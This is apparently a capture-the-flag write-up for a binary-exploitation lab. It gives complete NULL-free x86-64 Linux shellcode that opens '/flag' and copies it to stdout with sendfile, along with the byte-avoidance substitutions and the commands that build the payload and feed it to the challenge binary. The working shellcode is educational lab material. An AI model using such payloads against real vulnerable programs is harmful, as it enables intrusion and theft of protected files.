
NULL-free Shellcode

Changes to the previous code (each replaces an instruction whose encoding contained 0x00 bytes):

  1. mov rbx, 0x00000067616c662f -> mov ebx, 0x67616c66; shl rbx, 8; mov bl, 0x2f
  2. mov rax, 2 -> xor rax, rax; mov al, 2
  3. mov rsi, 0 -> xor rsi, rsi
  4. mov rdi, 1 -> xor rdi, rdi; inc rdi
  5. mov rdx, 0 -> xor rdx, rdx
  6. mov r10, 1000 -> xor r10, r10; add r10w, 0x3e8
  7. mov rax, 40 -> xor rax, rax; mov al, 40
  8. mov rax, 60 -> xor rax, rax; mov al, 60

Final shellcode.s:

# NULL-free x86-64 Linux shellcode (GAS, Intel syntax).
# Equivalent to: fd = open("/flag", O_RDONLY); sendfile(1, fd, NULL, 1000); exit(1);
# Every constant below is built so that no instruction encodes a 0x00 byte
# (32-bit mov for the string, xor + 8/16-bit arithmetic for small values).
# No error handling: a failed open() leaves -errno in rax and the sendfile
# below simply fails; for a challenge payload that is acceptable.
.global _start
_start:
.intel_syntax noprefix                  # applies to the following instructions; conventionally placed before _start
    mov ebx, 0x67616c66             # ebx = "flag" in little-endian; 32-bit immediate has no zero bytes
    shl rbx, 8                      # shift left one byte to make room for the leading '/'
    mov bl, 0x2f                    # rbx = "/flag" followed by zero bytes -> NUL-terminated once stored
    push rbx                        # path now lives on the stack at [rsp]
    xor rax, rax
    mov al, 2                       # rax = 2 = SYS_open (mov rax, 2 would encode zero bytes)
    mov rdi, rsp                    # rdi = pathname = "/flag"
    xor rsi, rsi                    # rsi = flags = 0 (O_RDONLY)
    syscall                         # rax = fd (or -errno)
    xor rdi, rdi
    inc rdi                         # rdi = out_fd = 1 (stdout)
    mov rsi, rax                    # rsi = in_fd = fd returned by open
    xor rdx, rdx                    # rdx = offset = NULL (read from the current file position)
    xor r10, r10                    # syscall ABI: 4th argument goes in r10, not rcx
    add r10w, 0x3e8                 # r10 = count = 1000; 16-bit add keeps the immediate at two bytes (e8 03)
    xor rax, rax
    mov al, 40                      # rax = 40 = SYS_sendfile
    syscall
    xor rax, rax
    mov al, 60                      # rax = 60 = SYS_exit; rdi is still 1, so the exit status is 1
    syscall
# Assemble and link without libc or startup files so .text contains only _start.
gcc -nostdlib -static shellcode.s -o shellcode-elf
# Extract the raw bytes of .text; before submitting, confirm none is 0x00 (e.g. with xxd on shellcode-raw).
objcopy --dump-section .text=shellcode-raw shellcode-elf
# Deliver the raw shellcode to the challenge binary on its stdin.
cat shellcode-raw | /challenge/binary-exploitation-null-free-shellcode